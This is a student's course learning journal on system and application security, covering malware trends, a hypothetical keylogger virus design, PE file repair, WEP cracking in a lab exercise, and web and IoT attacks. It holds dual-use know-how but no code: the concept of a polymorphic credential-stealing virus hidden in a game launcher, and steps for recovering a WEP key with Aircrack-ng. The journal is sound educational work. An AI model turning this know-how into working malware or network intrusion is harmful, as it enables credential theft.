Final Learning Journal

System and Application Security

Juan Fernando Giraldo Botello

Student Number: 612833

Department of Future Technologies

November 2019
Table of Contents

1. Introduction ...................................................................................................... 3
2. An overview of Malware ................................................................................... 5
2.1. Malware situation of the world ................................................................... 5
2.2. What has changed between the MS reports?............................................ 7
2.3. Design of a sophisticated piece of malware .............................................. 8
3. A closer look into Viruses............................................................................... 10
3.1. Fixing a PE file ........................................................................................ 10
4. Getting to know WLAN................................................................................... 14
4.1. WPA2/3 Information ................................................................................ 14
4.2. Harmfulness of Crack attacks.................................................................. 15
4.3. Current situation of the 4-way handshake ............................................... 15
4.4. What is new in WPA3? ............................................................................ 15
4.5. Recovering lost credentials ..................................................................... 16
4.6. Analysis of Defcon22 conference ............................................................ 17
5. Exploits and countermeasures ....................................................................... 19
5.1. What is a Man-in-the-browser attack? ..................................................... 19
5.2. Know Advanced persistent threat and targeted attacks .......................... 20
5.3. What is XSS? .......................................................................................... 20
5.4. IOT and common vulnerabilities .............................................................. 21
6. Software and system security ........................................................................ 22
6.1. Security tools and mechanisms ............................................................... 22
6.2. What is Ransomware? ............................................................................ 23
6.3. How malware makes itself invisible to antimalware software? ................ 23
6.4. System functionality, attack propagation and detection in dependent
systems ............................................................................................................. 24
7. Conclusion ..................................................................................................... 26
8. References .................................................................................................... 28
9. Appendices .................................................................................................... 29
9.1. Minutes of the meeting #4 ....................................................................... 29
1. Introduction
The present document is the final assignment for the course System and Application
Security, it is a compilation of multiple weekly reports that have been done over the
past two months using the knowledge acquired in the lectures, independent
research and discussion in group meetings. The contents of the reports vary from
one to another according to the topic of the lectures and the activities assigned by
the professors every week. The learning journal covers multiple topics in cyber-
security and networks.
The first topic addressed is malware in general and its impact on the world, then
viruses are explained, and a practical exercise is presented to help understand the
topic. The third subject reviewed is WLAN, here basic information is presented and
a practical example of the vulnerabilities of a network is also written about. Next,
exploits and countermeasures are described to present different examples of
situations where these topics have been present. In last place, software security
was described and researched.

The team for the weekly meetings was the number 12, conformed by Melissa
Welander, Fredrik Brushane, Heta Pärssinen, Luke Skeen and Juan Giraldo. Five
group meetings took place during the academic period, the first one was on
September 12 at 8:00 in the Natura building, the second one was on September 19
at 10:00 in the Natura building, the third one was on September 26 at 10:00 in the
Natura building, the fourth one was on October 10 at 10:00 in the Quantum building,
I was the chairperson in this meeting, and the last one took place on October 17
also in the Quantum building at 18:00.

In the current society information is everything, the ones who possess a great
amount information tend to use it to make much profit. That is why a massive
amount of services and devices capable of managing information efficiently have
been developed over the last few years and nowadays they are a vital part of the
everyday life of every person in the world. These information services contain any
kind of valuable data, from medical records and baking credentials to nuclear launch
codes. Due to the value of the information inside the systems, every day people try
to break into devices and use different techniques to steal the private information.
Therefore, a great amount of research and breakthroughs in the area of information
security have been made, some of the methodologies, techniques and tools are
presented in this journal. The subjects addressed in the course and therefore
presented in this work are of great relevance for a software engineer student who
is developing a knowledge base in cyber-security.

My expectations for the course were high, I was very interested in learning about
different mechanisms to defend against the multiple threats users encounter every
day on the web and in understanding in more depth how cyber-criminals manage to
penetrate and affect different technological devices. Before taking the course, I had
some knowledge about security and attacks due to a research project I did back at
my home university. The research was about implementing a methodology to detect
web defacement attacks. During the project I learned about attack vectors, web
architectures, countermeasures to web attacks and some exploits like SQL
injections and XSS attacks.
One can say I already had the base knowledge about some of the topics covered
by the course, but still, all the information presented by the lecturers was of great
importance to develop a deeper understanding of each topic and to create a
connection between each one.
2. An overview of Malware
In this report mostly information security topics are addressed, more specifically
Malware and its presence in our society. Information about the evolution and
present situation of Malware in the world is covered along with descriptions and
examples of some of the most relevant pieces of malware nowadays. To give an
accurate insight about the evolution of malware, a comparison between two official
Microsoft security reports is presented in the report. A detailed description of a
made-up virus is given in order to replicate the process of designing a complex piece
of malware.

2.1. Malware situation of the world

In the present, malware attacks are becoming very common and hard to detect in
time, these can vary from something harmless like an adware to an actual danger
like a ransomware. Some of the most important anti malware companies use the
data they gather about attacks to make in real time malware maps. In order to
analyse the malware situation of the world, the map of attacks from Kaspersky was
checked for three days in a row, focusing in three aspects, the countries with the
most attacks, the countries with the less attacks and the situation in Finland. It was
found that Russia, China, Germany, the United States and Brazil were the most
attacked countries through the 3 days of the analysis. Regarding the second aspect,
the most peaceful countries were Finland, Sweden, Norway, Denmark and Canada.
Finally, the observations showed that Finland suffered from very few attacks per
day, even less than Sweden, Norway and Denmark, making this nation the safest
among the northern countries.

All the information showcased in the map is gathered by Kaspersky using their
multiple anti malware services, like On-Access Scan - OAS, On-Demand Scan -
ODS, Web Anti-virus - WAV, Mail Anti-virus - MAV, IDS - Intrusion Detection Scan,
VUL - Vulnerability Scan, KAS - Kaspersky Anti-Spam and BAD - Botnet Activity
Detection. Taking this into consideration, one can say that the malware information
is accurate but as this is only Kaspersky’s data, the map lacks from representativity
as not everyone in the world uses Kaspersky as their main anti malware software.
Information about the most dangerous current pieces of malware was also collected
in order to have a better perspective of the potential threats people can run into
while using an electronic device. A table was made to present some of the most
dangerous researched malicious software (Table 1), at the top of this table is a
Ransomware called Wannacry, it was developed to encrypt the data of computers
running previous versions than Windows Vista, the objective of the cybercriminals
who created it was to request money to release the hijacked information. This piece
of malware affected more than one hundred thousand computers all over the world,
among the affected people there were hospitals, airports, phone and gas
companies, this is why this malicious software is at the top of the table, because it
actually compromised vital information needed to keep people alive.

Name OS/Application Type Information

WannaCry Win32 Ransomware Encrypts the victim’s

data and requests
payment to release it.

Emotet Win32 Trojan Banking polymorphic

trojan, oriented to steal
account information.

FBI Virus Win32 Ransomware Blocks the victim’s pc

impersonating the FBI
and requesting money
to unlock the computer.

Loyphish Any web browser Phishing Password stealing

website.

Suspicious.Emit Win32 Trojan Hides folders and files

from the victim’s pc.

Sirefef Win32 Trojan Download fake

applications.
 Kovter Win32 Trojan Downloads malware
into a pc.

ZeuS Win32 Trojan Steals sensitive

information from a pc.

Dridex Win32 Botnet Macro Virus that

installs keyloggers and
allows code injections.

Gh0st Win32 Trojan Steals email and

addresses to expand.

Table 1. Most dangerous malicious software

2.2. What has changed between the MS reports?

To understand the evolution of malware in the world, two Microsoft security reports
were read and compared, these were the Ten year especial of 2012 and most recent
one of 2018. Two key points were taken into consideration when the material was
reviewed, the evolution of malware attacks and the variation of the most attacked
countries. First, in the 2012 report the most used malware were Trojans, Worms
and miscellaneous unwanted software, but in the 2018 report the common threats
were Ransomware, Bit coiners and phishing attacks. Next, the countries with the
most infections back in 2012 were Turkey, Korea, Brazil, Taiwan and Spain, but
now according to the 2018 report these are Ethiopia, Pakistan and Palestine. One
of the main reasons for this evolution is the development of technology, many
patches and fixes were developed to stop the harm of the most common threats
back in the day, also most of the developed countries started to invest larger
amounts of money into cyber security. Another aspect to take in consideration is the
migration of everyday services to digital platforms, for example banking and social
security, this situation changed the focus of the cyber criminals and the vectors of
attack they use to apply.
2.3. Design of a sophisticated piece of malware
It was decided to design a sophisticated piece of malware to can help improve the
general knowledge of malicious software. Considering that nowadays the video
game industry is one of the biggest in the world with more than 40 billion dollars of
revenue per year, the proposed malware was focused to attack this industry in
specific. In general details, it is aimed at online video game players in order to steal
their game account credentials. The malware is made to generate money by selling
the account information of players to the highest bitter.

The malware was thought to be a keylogger virus which targets Windows 32- or 64-
bit operating systems and infects the executable file of a video game to steal the
account credentials of the player (Figure 1). The virus will be integrated to the game
launcher’s code by overwriting the parts of the file containing zeros, spaces or
padding making it very difficult to be detected by an antimalware software. This
malware will be put in the host’s machine when the user installs a third-party
software that provides in-game information but also serves as a container for the
virus. Now, whenever the launcher is executed the keylogger will be activated and
ready to capture the player’s account information by recording the keystrokes of the
user (Figure 2). The virus needs to survive in the system at least until the executable
file of the game is clicked for the first time after the infection.

The virus hides from scanners by encrypting its code and mutating on each
infection, so the instructions perform the way they are intended to perform but with
a different implementation. Whenever the user launches the game, the virus will
decrypt itself using the encryption key previously generated and will be ready to
capture data when the player logs in to his account. One way to defend from the
virus is using a two-step verification log-in that is usually provided by the game
companies. Also marking the client launcher in the malware software configurations
to do constant check-ups of that specific program. Finally changing the password
constantly is the most effective countermeasure for this malware.
 Figure 1. Malware structure

Figure 2. Malware functionality

3. A closer look into Viruses
Personally, I found the topic of computer viruses very interesting and important,
because due to the current state of technology, getting infected is as easy as
clicking a link to an unknown web page. And taking into consideration the incredibly
harmful consequences that a virus can create, it is always good to be aware of the
threats and how they work. I was very glad to learn about the types of viruses
currently in existence, because you normally hear about how the viruses merge with
a program, but you don't know how they do it and using which techniques. Learning
about how the viruses hide from anti malware software was also very useful, this
helps you to understand the inner workings of the virus and how it can be spotted
even without an antivirus.

It was of great help to see examples of every hiding technique because having a
practical implementation makes the understanding of the methods way easier. In
addition the section about the detection methods for viruses was the most useful of
all, due to the annual growth and evolution of technology new hiding methods are
developed, each time more complex and ingenious than the last time, this is why
knowing multiple techniques of detection comes in handy to defend against these
threats that attempt to harm our integrity.

3.1. Fixing a PE file

To acquire a deeper knowledge about computer viruses it was decided to analyse
and repair a PE file that was attacked by a virus, the threat was removed from the
file, but the executable was left completely useless. The first thoughts are that a
parasitic virus replace some part of the code and when the malware was removed
so did the code, leaving the software without a chunk of code. Other option is some
of the virus code is still inserted in the file causing it to malfunction.

The first step to address this problem was to try to execute the file, it was executed
in a computer running windows 10, but every time the file was clicked a warning
was shown saying that the application cannot be run in Win32 mode (Image 1). In
order to try the file in other operative system, a program called WineBottler, that
allows the execution of Windows applications in MacOS, was installed on a
MacBook Pro, it was a surprise realizing that without changing any configuration of
the file, it was executed correctly in the Mac environment (Image 2). Knowing that
the file can be executed properly without making any corrections to the code means
that the main structure of the PE file was not altered and that the problem must be
in the configuration of the file that Winne can fix by itself. It was decided to explore
more closely the contents of the executable in order to understand what is
happening inside.

Image 1. Result of executing the .exe file on Windows

Image 2. Result of executing the .exe file on MacOS

Using a PE viewer it was possible to identify the sections of the mystery file, it was
divided in the DOS_HEADER, the DOS_STUB, the NT_HEADERS containing the
PE file signature, the PE file header and the PE optional header, it also has the
SECTION_HEADER, which defines an array of 7 positions for the .text , the .rdata,
the .data, the foobar1, the foobar2, the foobar3, and the .rsrc fields (Image 3). At
the end it has the IMPORT_DESCRIPTOR and the DIRECTORY_TABLE, this
confirm us that the structure of the file is intact so the virus must have changed the
content of any of the sections. Something to notice is that the file is digitally signed,
these signatures are used by the software publishers to identify the executable file
as theirs, a valid signature ensures the authenticity and the integrity of a PE file.
Looking deeper into the signature it was found that the signer was “SysTApplSecur
rulz OK!” and also that the signature is not valid, meaning that there is a high chance
the digital signature was modified by the virus and the current one is not the original.
Taking into consideration that the only thing needed to change the signature of a
file is editing the hex code, one can say that executing a PE file based only in the
digital signature is not a good decision.

Image 3. The .exe file opened in a Hex editor

Making use of the hex editor built in the PE viewer it was possible to explore the
contents of each one of the sections in the file, some useful information was found
inside. The first thing to notice is that the file contains a MZ header which confirms
the executable file is MS-DOS-compatible. The PE header is also present in the hex
code as well the section header definitions, meaning that the content of these
sections is correct. The previous sections were followed by a long padding of zeros,
for some unknown reason the hex editor highlighted this section with a red colour
like if it was not supposed to be there. A section declaring what looked like an error
logs, followed by a charset table and a calendar format, these parts of the code
appear to be legit and not tampered by the malware. Two sections of the code were
especially striking, the first one was a series of strings saying “Hello from Sys-
AppSec test application”, there were two of these separated by three zeros, but at
the end of the second string there also was three zeros followed by the letter “H”,
this raised the suspicion that other string was missing. The other striking part of the
code was almost at the end of the file, it consisted of multiple copies of the phrase
“SystApplSecur rulz OK!”, considering that this is the same digital signature of the
executable file and that is very possible the signature was changed by the virus, the
text seemed like it was planted by the malware.

Using the information previously collected, some strategies were developed to fix
the PE file. The first approach was deleting the padding found after the PE header
in the hex file, this not only did not fix the issue but left the file completely useless,
at a point that windows won't even recognise it as a .exe file. With this, the theory
that the virus might have left some paddings that can be removed to fix the file fell
apart. Next, the text containing the “Hello from Sys-AppSec test application” phrase
was addressed, this piece of code looked like it had an unfinished pattern so it was
decided to complete it by overwriting some of the current bytes with the ones that
completed the pattern. Unfortunately, this procedure didn't fix the application but
unlike the previous method, this one didn't leave the file useless.

Other approach used was to delete the text containing the words “SystApplSecur
rulz OK!”, based on the premise that the digital signature was altered by the
malware, this method didn't fix the application. Knowing some viruses can insert
themselves in paddings, it occurred that the text previously mentioned might not
needed to be deleted but replaced with zeros, unfortunately this didn't work either.
At this point it was decided to investigate more about how Wine Bottler executes PE
files, but due to lack of documentation of that software it was impossible to get any
valuable information that could have been used to fix the application. In the end the
file wasn't fixed, but that task is left for future work based on this research.
4. Getting to know WLAN
I already knew the basics about wireless LAN, but it was helpful to receive an
introduction to this technology because I didn't recall very well some topics like
security mechanisms and WLAN communications. Also, it was very interesting to
see actual statistics about the WLAN security situation in some countries, for
example in Romania one can see how they drastically improve the security of their
wireless networks in only 4 years. Personally I found useful the review and
description of the different infrastructure attacks because you always hear in the
tech field people talking about different wireless attacks, you know what they mean
but you don't know how they work, so it was nice to get to understand them more
deeply.

The most interesting topic reviewed the past week was the different WLAN
protocols, WEP, WPA, WPA2, WPA3 and WPS. First, the explanation of the WEP
was especially useful, because you get to understand how was developed the first
approach to wireless security, also you can understand what went wrong and learn
from that so in the future these mistakes don't come back. It was shocking that
knowing that WEP has been deprecated from more than 16 years, some people are
still using it to “protect” their wireless networks. But it is good that in Finland WEP is
still covered by the law, so it gets a little bit of protection from that aspect.

Now regarding the WPA protocols, it was interesting to learn about the evolution
and current state of this wireless security tool. Especially how the original WPA was
cracked and how the second version of it was constructed as a fix for all the known
vulnerabilities, also it was nice to understand the improvements that the third
iteration of WPA is going to provide. Finally, I was able to learn about a new network
feature, last week was the first time I heard about WPS. Even though this is
considered a very insecure network security protocol, I find it a very clever idea to
address the problem of connection to an AP, but sadly it was poorly executed.

4.1. WPA2/3 Information

I as most people in the tech world, consider WPA2 a very secure system due to the
implementation of the CCMP protocol, based on the AES encryption algorithm
instead of the obsolete RC4. The fact that AES has never been broken gives some
confidence to the users but WPA2 consist of more working parts that can be broken
due to known vulnerabilities, such as the exploitation of the group temporal key
(GTK) or the EAPOL 4-way handshake. One example of an attack that used the
GTK is Hole 196 which takes advantage of the fact that the GTK are not as protected
as the PTKs and used the captured key to do bad things like sending broadcast
messages. Fortunately, this attack wasn't a big deal due to the fact it could be easily
mitigated, and the attacker needed to be an authenticated user in a WPA/WPA2
enterprise network. Overall the attacks on WPA-CCMP are not that harmful and are
easy to avoid, thanks to the features provided by this standard.

4.2. Harmfulness of Crack attacks

In my opinion the KRACK attacks are very critical because almost every device that
supports Wi-Fi is affected by this exploit and as evidenced in the previous lecture,
people are not aware of this method. Using this technique is relatively easy, the
attacker only needs to be in the range of the victim, and he/she must know how to
perform the attack, and that is not a problem due to the multiple videos and tutorials
currently uploaded on the internet. By exploiting this vulnerability an attacker can
decrypt all traffic in a network and inject and forge packages, this can lead to the
theft of bank credentials, photos, videos, sensitive information among others. The
one thing an attacker cannot do is getting the network password.

4.3. Current situation of the 4-way handshake

The 4-way EAPOL handshake for key exchange is not secure enough because as
seen in the demonstration at the lecture it is very easy to be used as a mean to
crack the network password, and unfortunately the only way to not be exposed to
this vulnerability is to not use Wi-fi networks at all, which it's kind of difficult in our
current world. A paper about the security of the 4-way handshake was found and
reviewed.

4.4. What is new in WPA3?

The main improvements of WPA3 are, better protection for brute force attacks, this
is possible by limiting how often you can guess a password, also the implementation
of individualized encryption which is very useful to hide the web traffic even in public
networks. Finally, WPA3 implements a stringer encryption system with a key length
of 192 bit, making this even stronger than the current WPA2 encryption.

4.5. Recovering lost credentials

In order to recover the credentials of the router, some steps were required to be
followed. In the first place the contents of the provided traffic files were analysed
using Wireshark, unfortunately both were encrypted which made impossible the
task of getting any useful information at their current state. Doing some research, it
was found that with the WEP key of the network, the traffic of the file can be
decrypted. So, the next step was to try to get the WEP key, it was decided to use
Aircack-ng in order to crack the network using the IVs inside the files. It is needed
to have a Linux distribution OS to run Aircrack-ng, so in this case an Ubuntu OS
was set up in a virtual machine so the program could be used to crack the key.

The larger file was the first one to be analysed by the software, it only took less than
a second to get the WEP key using this file (Image 4). The second file did not
produce key, the program couldn't crack it, but it didn't matter because both files are
from the same network so the first key should work for the two of them. Using
Wireshark and the key it was possible to unencrypt the contents of the
“encrypted_connection” file by adding a WEP decryption key in the IEEE 802.11
wireless LAN preferences. Now all left to do was to find the router credentials inside
the network traffic, fortunately the information provided in the problem description
stated that the credentials were stored in the browser which means that is very
possible that they were used in an HTTP request to a web server. Now an HTTP
filter was applied in Wireshark to search for the credentials inside de packet. Right
down into the authorisation section of the Hypertext Transfer Protocol information,
the username and the password were found (Image 5).
 Image 4. Wep key in Aircrack-ng

Image 5. Router credentials in .pcap file

4.6. Analysis of Defcon22 conference

The Manna from Heaven toolkit combines mostly improved Karma attacks and Man
in the middle attacks, such as cookie capture, HSTS partial bypass, installation of
malicious iOS profiles, captive portal SE, credential stealing, online check bypass
and certs sideloading. All these are based on the rogue AP attacks which allow the
cybercriminal to access the victim’s device. The effects on wireless security are very
drastic because this toolkit is oriented to remove the barriers that tech companies
have been setting up to contra rest the rogue AP attacks. With this attack almost
any kind of data can be stolen from a person, for example with Firelamb, a feature
present in the toolkit, the cybercriminal can steal the credentials of multiple web
services, like Facebook, Gmail or Amazon through the capture of the user’s cookies.
Unfortunately there is little that a person could do to protect from these attacks, the
most important countermeasure is to not expose yourself, this means do not use
any wireless networks in very crowded public areas, also deactivate the auto
connect option for any wi-fi network and do not save any of these in your preferred
network list.

The attacks present in the toolkit are especially dangerous because they are
relatively easy to implement, any person with enough knowledge in networks and
Linux can download the software and execute the correct commands to start getting
valuable information, even though the demo in the video didn't work, but apparently
it was due to the specific network situation at Defcon. A new rogue AP attack toolkit
was released as a part of a Defcon 26 talk. This software is called w1f1 and it
specialises in Wi-Fi hacking, it uses most of the features in the Manna from Heaven
toolkit. The documentation for this new program claims that it is a replacement for
the deprecated mana-toolkit, which means that the software presented back in the
Defcon 22 is no longer relevant.
5. Exploits and countermeasures
This week’s topic was especially useful and interesting because nowadays a lot of
different exploits are being used to commit illegal activities and is on the developers
and engineers to come up with mechanisms to fight this threat. I already had some
knowledge about exploits and different attack vectors that cyber-criminals use, but
still it was good to get the concepts refreshed and to look at some real-life examples
of attacks. It was also good to learn about not only the exploits but the
countermeasures as well, so one can be prepared for any attack or malicious
activities.

Personally, I am very familiar with the injection attacks, SQL and XSS, due to some
research I made back at my home university. The research was oriented to prevent
web defacement by dynamically analysing the HTML and JavaScript code of a web
page. As a matter of fact, the main causes of defacement are SQL injections and
XSS, which can compromise the credentials or authentication of the web page
allowing an intruder to modify its content.

5.1. What is a Man-in-the-browser attack?

Man-in-the-browser threat is an attack that commonly uses a trojan horse to infect
the web browser and modify the pages to intercept transactions before they are
rendered to the user or submitted to the server. By doing this the cyber criminals
can steal account credentials or just steal money by changing the properties of the
transaction without any part of it noticing. Most of the attacks happen through
plugins or extensions in the browsers. The Zeus trojan is connected to the MiTB
attack because it has been one of the most used attack vectors to infect browsers.

Some countermeasures have been developed to stop these kinds of attacks, for
example, field obfuscation, real time encryption of sensitive fields, and fake strokes
to defeat browser based keyloggers. All these strategies are focused to hide the
sensitive information from the attackers.

Some Finnish banks have implemented some security mechanisms, like two-step
verification to double check if you are the one making the transaction and if the
information is correct, also the manual insertion of randomly generated credentials
in obfuscated fields is being used at banks like Osuuspankki.

5.2. Know Advanced persistent threat and targeted attacks

According to Imperva labs, an Advanced persistent threat is an attack campaign in
which an intruder, or team of intruders, establishes an illicit, long-term presence on
a network in order to mine highly sensitive data. Most of the times the targets of
these attacks are very important executives or high-grade politicians. Also, these
attacks are carried out by nations to attack other nations, A recent example of an
APT attack is Deep Panda which in 2015 affected the US Government's Office of
Personnel Management, it compromised more than 4 million records of highly
ranked personal in the US government. This attack was attributed to the ongoing
war between China and the US.

On the other hand, a targeted attack is a threat used by cyber-criminals to extract

valuable information, like bank account credentials or credit card information, this
attack is executed through a highly complex process of social engineering in which
personal information of the target is extracted to perform a perfect and infallible
attack. The usual targets are not highly important people, in contrast to the APT’s.
One example of targeted attacks is Phishing, where the attacker sends an email to
the victim with relevant information and a malicious link or file, these can
compromise the device where they were open or lead the user to malicious sites
used to steal credentials and other valuable information.

5.3. What is XSS?

Cross-Site Scripting is a cyber-attack where the criminals take advantage of poorly
made web applications by injecting JavaScript code into input fields to retrieve
valuable information or change the way the web server functions to commit other
illicit activities in the future. Most of the times the web applications do not implement
security measures to prevent the injection of code and that is why this attack is very
dangerous. Over the years many countermeasures have been developed to stop
this kind of attacks, most of the implemented techniques were successful and the
rate of these attacks have reduced considerably over the years.
The most popular and effective countermeasures are input sanitation, which cleans
the inputted text from any unwanted characters or words, encoding, this technique
restricts the input to only be read as plain text and not as code that can be executed
by the server, and XSS prevention libraries, which contain different tested tools that
can be used in any web application very easily. The previous countermeasures are
being used in multiple web applications over the world and it is proven that have
been very successful in preventing Cross-Site Scripting attacks. The effectiveness
of the techniques relies in that they are implemented in the server itself.

5.4. IOT and common vulnerabilities

Nowadays the internet of things trend is at its peak, and billions of IoT devices are
being used all over the world. What people don't know is that these devices have
major security flaws and are very vulnerable to cyber-attacks. The most relevant
vulnerabilities that have been identified are, lack of network security, caused by
performance and power constraints, most of the devices run on batteries or have
little computational power which makes impossible to implement security protocols
that are based on complex algorithms and encryption, faulty authentication systems,
caused by the use of weak and default passwords. Also, the lack of constant
updates and security patches of software and firmware play a great role in this
problematic.

One of the most harmful vulnerabilities where IoT devices were involved was the
Mirai attack. Millions of devices were infected by a malware that turned them into
zombies for a massive botnet that was used to create multiple DDoS attacks that
affected a great number of important companies like GitHub, Twitter, Netflix and
Airbnb.
6. Software and system security
The topics addressed in these two weeks were very important to me, because as a
software engineer the safety and the wellbeing of the users of my products is one
of my primary concerns. The techniques and the different research papers
presented were of much help to understand the actual situation of the software
security and to get a look at the newest and greatest breakthroughs in the security
field. One topic that was especially interesting was the agile and security research
because nowadays almost every software company is implementing some kind of
agile methodology to develop software, like Scrum or Kanban, so a lot of programs
and services are launched to the market using these techniques and if there is some
security flaw a great number of users will be affected. With the findings in the
presented papers software engineers can implement better practices and improve
the current ones to guarantee a product of high quality.

6.1. Security tools and mechanisms

Nowadays software is all around the world and affects all the activities people do,
big companies and governments use software to develop large and complex
information systems that make easier the job of saving, searching and deleting data.
Due to this trend of digitizing information, software security has become an
important topic in the technological industry. Multiple software security mechanisms
have been developed to ensure the safety and wellbeing of the software systems.
The mechanisms can be divided into four categories, the ones to improve software
security, the ones to prevent attacks, the ones to detect intruders and the ones to
defeat the attacks. Some examples are Firewalls, Encryption, Automated testing
and beta testing, Intrusion detection systems and Intrusion prevention systems, and
Honeypotting.

The most interesting mechanism among the ones previously named, is

Honeypotting. This a way to prevent software security attacks by learning from them
after setting up a fake environment of resources in a computer network. Basically,
Honeypotting is the practice of placing Honeypots or set up devices that act as a
trap for attackers and then learn from those attacks. Usually cyber-criminals think
they are affecting a real victim so they use hacking techniques and different attack
vectors to crack the system, but what they don't know is that they are being
monitored and learned from, so computer scientists can develop countermeasures
to the vulnerabilities the attackers are focusing. Honeypotting is mostly used to learn
about more sophisticated attacks like APTs.

6.2. What is Ransomware?

Ransomware is a type of malware that focuses on encrypting valuable information
for the victim and restricting access to certain services. The main goal of this attack
is to earn money through bitcoin payments for the release of the affected device.
Most of the times the cyber-criminals give the victim a limited amount of time to
make the payment, so either the transaction is done or all the files and data that is
being held will be permanently deleted. This malware has affected many companies
and important organizations like hospitals or airports, which rely mainly on their
information services.

One of the most harmful ransomwares has been Wannacry, it affected more than
141000 computers all over the world and compromised the security of multiple
governmental organizations like hospitals and natural gas companies. The attack
was based on a known vulnerability of the Windows OS, all the affected computers
didn't have the latest versions of Windows which left them defenceless against the
cyber-criminals.

6.3. How malware makes itself invisible to antimalware software?

Malware like Viruses, Worms, Trojans or Ransomwares are specially designed to
hide from antimalware software, so the intruder can stay as long as possible inside
the victim’s device to cause more damage or to accomplish a final goal. Some of
the most popular hiding techniques used to cover the existence of malware in a
device are, compression, self-coding or encryption, polymorphism, metamorphism
and entry point obscuring.
The most interesting hiding method among all of these is polymorphism, with this
technique the malware mixes its contents with the host programs to make himself
unrecognizable by any antimalware software, it leaves a little piece of code
unencrypted to enable decryption. In addition, a mutation engine is also present
inside the virus, and every time the malware infects a device the engine modifies
the decryption algorithm so that the functionality remains the same, but the
implementation is different. Most of the times the engine only adds extra functions
that have no functional relevance but change the appearance of the code. Every
time an infection occurs a new encryption key is generated to encrypt a copy of the
virus inside itself and then uses the mutation engine to create a new decryption
code implementation that will be attached to the host file.

6.4. System functionality, attack propagation and detection in dependent

systems
One good example where multiple dependency between different modules and
systems exist is a web application. Most of these are based on the MVC pattern
which allows a clean architecture of the software by having three main components,
the model, the view and the controller, these have multiple and well-established
responsibilities. One of the most important relationships on a web application is the
one between the user interface and the business logic, here the user can make
requests that will travel to the backend and then will be processed by the controller
to use functionality and data from the model. Here the user interface depends on
the server to get information and to display it, and the server depends on the user
interface to get the user input needed to conduct the operations.

Some of the most common attacks to web applications are SQL injections and XSS
attacks, these use the user interface to inject JavaScript code or SQL queries to
alter either the functionality of the server or to retrieve valuable information like credit
card credentials from the database. In case of one of these attacks the functionality
of the system would remain the same regarding what the user can see, but internally
the server could have been modified by a script and now it is not working as it was
programmed. For example, a simple script can modify a web application that
redirects the user to a payment page where he/she must input their credentials, to
lead the user to fake page that will capture their credentials.
Regarding the attack propagation, it is limited to the specific attacked web
application, but the damage to the server would be considerable if the code injection
manages to pass all the filters and detection mechanisms that should be
implemented in the application.
The spreading of the attack starts from the user interface and starts to move up from
component to component until it reaches the backend and causes the damage. The
detection of the attack should be relatively easy because nowadays most web
applications have input sanitization systems that prevents and alerts of any possible
injection attack. Also, if the malicious request manages to pass through the input
validation system, the web server should have a detection system that analyses the
request and determine if it is benign or not.
7. Conclusion
During the course I was able to learn new topics like WLAN and software security
and improve my knowledge about the ones I already knew, like malware and
exploits. One subject that I was able to understand better was encryption, I got the
chance to see how it works and by which operations it is possible, mainly by
cryptography. Due to the practical component of the course I was able to learn about
many different tools related to cyber security, like Hex editors, Wireshark, Aircrack-
ng, among others. All the information provided by the professors was very clear and
they always presented the connection between every discussed topic so we could
understand how each one fits into the system and application security.

Personally, I found interesting the lecture about malware, because as I said before
I had a basic knowledge about this topic but not the full picture of how malware
actually works and what types exist. With the explanation of the professors and the
material presented for the lecture I learned that viruses are not the only kind of
malware and that there are multiple ways malware can hide even from the most
sophisticated antimalware software. Another interesting point was that when
starting a new topic, the professor always talked about the background of the topic
and not only the topic itself, how it started and why it was developed. In my opinion
this helps to create a perspective on why and how the technology keeps evolving.
Something that I didn’t like about the course was that we didn’t have a practical
excise for every assignment, personally I enjoy applying the theory into a certain
problem to help sink the ideas better into my mind. For example, it was very
interesting to use the knowledge about malware to try to fix the broken PE file, even
though my group couldn’t fix it.

My knowledge about cyber security has improved drastically, when I started the
course I only had basic understanding of most of the topics covered in the lectures,
now, thanks to the groupworks and the materials provided by the professors I have
been able to develop a deeper knowledge base. The understanding I used to have
of security was incomplete and composed of different parts without any connection
between each other, I only knew basic concepts of isolated topics I have picked up
during other courses. Also all my knowledge was theoretical and I never tried or saw
this concepts in action, but now I have not only created a bigger picture of the topic
in general and gotten a much clearer understanding of the addressed subjects but
I have seen them in practice and I have been able to interact and apply them to
solve different problems.
8. References
[1] J. Ruohonen and V. Leppanen, “A Case-Control Study on the Server-Side
Bandages Against XSS” Data feed retrieved in October:
https://moodle.utu.fi/pluginfile.php/996636/mod_resource/content/1/SQAMIA_2018
_Ruohonen.pdf

[2] S. Rauti and S. Laurén, “Honeypot, Sandbox, and Monitoring” Data feed
retrieved in October:
https://moodle.utu.fi/pluginfile.php/825952/mod_resource/content/0/UTU_WP4_3c
ybertrust_final_report_20170616.pdf

[3] S. Rauti and V. Leppanen, “Man-in-the-Browser Attacks in Modern Web

Browsers”, in Emerging Trends in ICT Security, 2014, pp. 469-480.

[4] P. Ferrie and P. Szor, “Zmist Opportunities”, Virus Bulletin, pag. 6-7, March 2001.
9. Appendices
9.1. Minutes of the meeting #4
Group Work assignment 4
Place: Quantum Building UTU
Date and time: 10/10/2019
Chairperson: Juan Giraldo
Present: Juan Giraldo, Luke Skeen, Melissa Welander, Heta Pärssinen, Fredrik
Brushane.
Not Present:
Summary of meeting participation after this meeting:
Juan Giraldo has missed 0 meetings
Luke Skeen has missed 0 meetings
Melissa Welander has missed 0 meetings
Heta Pärssinen has missed 0 meetings
Fredrik Brushane has missed 1 meeting

Chairperson opened the meeting at 10:00.

Discussion of the researched topics:

The meeting started by talking about our findings about the topics that
were proposed to research. First Juan gave a general definition of APTs, next Luke
and Fredrik helped to complete it by sharing their own findings. The spreading
and mitigation strategies were also discussed, and it was concluded that exploits
like SQL injection and XSS are the most used tools to spread the APT. Also, some
mitigation strategies were recognized to be the better ones, for example, traffic
monitoring, web application firewalls, whitelisting, strict updating policies, encryption
of sensitive data, Luke mentioned two factor authentication and Fredrik proposed to
restrict the hardware that the employees use inside the company, like laptops and
USB thumb drives.

Some famous APT attacks were shared in the meeting, Juan talked
about NetTraveler, Titan Rain and GhostNet. Luke and Heta talked about shadow-
hammer.
The man in the browser threat was also addressed, first the general definition was
discussed among the team. Next it was concluded that the Zeus trojan is connected
to the MItB attack because the Trojan is how the attack can take place, basically
the Trojan implants the malware in the browser. Some discussed countermeasures
were field obfuscation and real time encryption of sensitive fields. Various cases of
attacks and vulnerabilities were found by the group members, the most relevant
were the pacemaker’s vulnerability, the drug infusion pumps security breach, the
hijacking of hospital networks and the hacking of heart rate monitors.

The group concluded that in those cases the lack of network security and of
a system that allows a secure connection between the device and the real user,
are the reasons why there were vulnerabilities. The information was retrieved from:
